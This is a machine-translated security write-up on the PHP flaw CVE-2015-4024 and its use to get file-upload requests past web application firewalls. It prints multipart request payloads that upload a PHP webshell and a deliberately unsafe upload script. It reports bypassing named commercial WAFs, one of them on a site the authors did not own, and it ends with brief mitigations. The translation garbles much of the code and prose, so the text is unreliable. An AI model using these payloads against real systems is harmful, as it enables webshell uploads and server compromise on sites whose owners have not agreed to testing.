New utility of php dos Vulnerability: CVE-2015-4024 Reviewed

New utility of php dos Vulnerability: CVE-2015-4024 Reviewed

0x01 how WAF is bypassed
According to the principles of the php dos Vulnerability, when the multipart_buffer_headers function resolves the value corresponding to the header, there are n rows of value. The string in each line starts with a blank character or does not store the character ':', which triggers the following code block that combines values. Then, the value of the parsing header must be executed (n-1) times merged into the value code block, resulting in DOS.
Prev_len = strlen (prev_entry.value );
Cur_len = strlen (line );
 
Entry. value = emalloc (prev_len + cur_len + 1); // fragment memory once
Memcpy (entry. value, prev_entry.value, prev_len); // One copy
Memcpy (entry. value + prev_len, line, cur_len); // One copy
Entry. value [cur_len + prev_len] = '\ 0 ';
 
Entry. key = estrdup (prev_entry.key );
 
Zend_llist_remove_tail (header); // memory is released once
The official PHP repair solution avoids repeated copies when merging, thus avoiding DOS. The key to bypassing WAF is that when the PHP multipart_buffer_headers function resolves the value corresponding to the header, there are multiple rows of value. Strings in each line start with a blank character or do not store the character ':'. The strings are merged. When parsing the File Upload File Name, WAF does not consider protocol compatibility and does not Merge multiple rows to bypass.
Upload \ nf/shell. php ", because"/"is the directory separator, the uploaded file name is changed to shell. php. The following describes how to upload files by bypassing paylaod, test script, and paylaod.
WAF bypasses payload:
------ WebKitFormBoundaryx7V4AhipWn8ig52y
Content-Disposition: form-data; name = "file"; filename = "test3.jpg \ nsf/shell. php
Content-Type: application/octet-stream
 
Eval ($ _ GET ['C'])?>
------ WebKitFormBoundaryx7V4AhipWn8ig52y
Script for testing the file upload function:
$ Name = $ _ FILES ['file'] ['name'];
Echo $ name;
Echo "\ n ";
Move_uploaded_file ($ _ FILES ['file'] ['tmp _ name'], '/usr/local/nginx/html/upload /'. $ _ FILES ['file'] ['name']);
Echo "upload success! ". $ _ FILES ['file'] ['name'];
Echo "\ n ";
Echo strlen ($ _ FILES ['file'] ['name']);
?>
Payload can be uploaded normally

0x02 bypassing WAF practices
The author builds his own test site, connects 360 webguard and jiasule, and verifies the method of bypassing the WAF File Upload defense.
2.1 bypass 360 website guard
Step 1: Verify that the website has been protected by the 360 website guard and the requests for directly uploading PHP files are blocked.

Step 2: the website guard 360 is successfully bypassed and the shell is uploaded. The file is apo. php. In this request, whether the Content-Type does not affect the bypass.

2.2 bypass know chuangyu jiasule
Step 1: Verify that the website is protected by jiasule and that requests for directly uploading PHP files are blocked.

Step 2:
After successfully bypassing jiasule, upload the shell file syt. php.

2.3 bypassing Baidu cloud Acceleration
Baidu cloud acceleration and CloudFlare can be seen from the Baidu Uniform Acceleration interception page that CloudFlare is used, but it is estimated that Baidu cloud acceleration is a product of both Baidu and CloudFlare. Baidu did not set up its own test environment. He found a site connected to Baidu cloud acceleration for testing.
Step 1: Verify that the website is protected by Baidu cloud acceleration and that requests for directly uploading PHP files are blocked.

Step 2: successfully bypass cloud Acceleration

2.4 dongle Test
This method is used to test the upload of dongle files,
Content-Disposition: form-data; name = "file"; filename = "2.php
Aa:
Content-Type: image/jpeg
Php and aa are % 0a, And the Apache process that processes the request crashes directly. It seems that it can overflow without going deep.
2.5 CloudFlare Testing
To test whether CloudFlare can bypass the international version, we bought its service. As a result, when all rules are enabled, the system does not intercept file uploads.

2.6 Amazon WAF
There are no rules for Amazon WAF. All rules need to be configured by the user. In the configuration options, there is no file upload option, so there is no bypassing. The difference between WAF in China and WAF outside China is quite big. Why is this design worth pondering.

We also bypassed other WAF, which is not listed here.
0x03 extension-more work
3.1 analyze the bypassing of other characters in filename
Similarly, we found that in addition to double quotation marks, using single quotation marks can also bypass WAF defense and implement file upload.
------ WebKitFormBoundaryx7V4AhipWn8ig52y
Content-Disposition: form-data; name = "file"; filename='test3.jpg \ nsf/shell. php
Content-Type: application/octet-stream
 
Eval ($ _ GET ['C'])?>
------ WebKitFormBoundaryx7V4AhipWn8ig52y
3.2 analyze other application scripting languages
We also found that jsp parsing also has its own characteristics and can be used to bypass WAF. Currently, common WEB application scripting languages such as asp, aspx, and python are not tested.
0x04 Solution
4.1 solution 1
When parsing a file upload request, if the request does not comply with the protocol specification, the request is rejected. Mistaken interception may occur. You need to evaluate the impact scope of the mistaken interception.
4.2 solution 2
Php-compatible File Parsing Method. when parsing a file name, it starts with single or double quotation marks and the corresponding single or double quotation marks are closed.
0x05 Summary
This article through Review PHP Remote dos Vulnerability (CVE-2015-4024), and the use of this feature bypass the existing WAF File Upload defense, successful upload shell. The more important value is to provide us with a new idea to bypass WAF, a new research direction: to bypass WAF defense by using the difference between the backend application script and WAF behavior. In general, a good WAF should be able to handle differences compatible with WEB application containers, standard protocols, and web servers.